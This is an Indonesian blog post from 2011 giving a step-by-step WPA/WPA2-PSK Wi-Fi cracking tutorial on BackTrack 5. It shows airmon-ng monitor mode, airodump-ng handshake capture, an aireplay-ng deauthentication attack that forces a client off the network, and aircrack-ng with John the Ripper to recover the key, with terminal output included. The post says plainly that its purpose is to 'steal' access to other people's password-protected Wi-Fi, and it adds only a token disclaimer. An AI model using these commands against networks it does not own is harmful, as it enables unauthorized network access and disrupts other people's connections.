Minggu, 25 Desember 2011

Tips Komputer Jaringan Video Tutorial How To Wirelles Hacking


Tips Komputer Jaringan Video Tutorial How To Wirelles Hacking - Video Tutorial ini merupakan media pembelajaran semata, jadi bagi anda yang ingin belajar Cara Hacking Wirelles - Cracking WPA/PSK Key diharapkan memakai ilmu ini secara bijak.

Tujuan dari Hack Wirelles - Cracking WPA/PSK Key ini adalah untuk mendapatkan password wifi secara gratis, apabila wifi tempat anda diberikan password.

Jika anda ingin mencobanya coba siapkan dahulu:
  • Backtrack 5 untuk secondary Operation System anda. Jadi buatlah dual boot.
  • Mengumpulkan password wordlist, agar bisa melihat passwordnya.
  • Koneksi Wirelles atau wirelles card.
  • WPA yang ada di laptop anda.
  • Jhon The Ripper Password Cracker.
  • Aircrack-ng dan airodump-ng (aircrack package)


    How To Wirelles Hacking?
    Answer:
    1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:

    root@binushacker:~# airmon-ng start wlan0

    Interface Chipset Driver

    wlan0 Zydas zd1211 zd1211rw - [phy1]
    (monitor mode enabled on mon0)

    2. Selanjutnya jadikan target wireless tersebut:

    root@binushacker:~# airodump-ng mon0

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless

    3. JIika sudah mari kita mulai mengambil / mencuri akses wireless

    root@binushacker:~# airodump-ng mon0 --channel 11 --bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

    CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless

    BSSID STATION PWR Rate Lost Packets Probes

    38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

    Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
    Sabar saja ketika menunggu. Pasti ada yang login logout kan? Nah sampai ketemu hal seperti berikut dibawah:

    4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:

    root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
    21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
    21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
    root@binushacker:~#

    5. Setelah logout user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

    CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless

    BSSID STATION PWR Rate Lost Packets Probes

    38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161

    6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

    root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
    Opening /tmp/wpa2-01.cap
    Opening /tmp/wpa2-02.cap
    Reading packets, please wait...

    Aircrack-ng 1.1 r1904

    [00:00:00] 48 keys tested (489.60 k/s)

    KEY FOUND! [ W!R3L3$$PWD ]

    Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
    8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

    Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
    8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
    6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
    D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
    EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
    root@binushacker:~#

    Nah, passwordnya ketemu: W!R3L3$$PWD

    7. Jika anda tidak mau memakai, wordlist biasanya menunggu agak lama, apalagi jika komputernya lemot. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

    root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w
    -/tmp/wpa2*.cap
    Opening /tmp/wpa2-01.cap
    Opening /tmp/wpa2-02.cap
    Reading packets, please wait...

    Aircrack-ng 1.1 r1904

    [00:00:22] 11484 keys tested (534.50 k/s)

    KEY FOUND! [ W!R3L3$$PWD ]

    Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
    8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

    Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
    8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
    6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
    D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

    EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B root@binushacker:~#

    Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD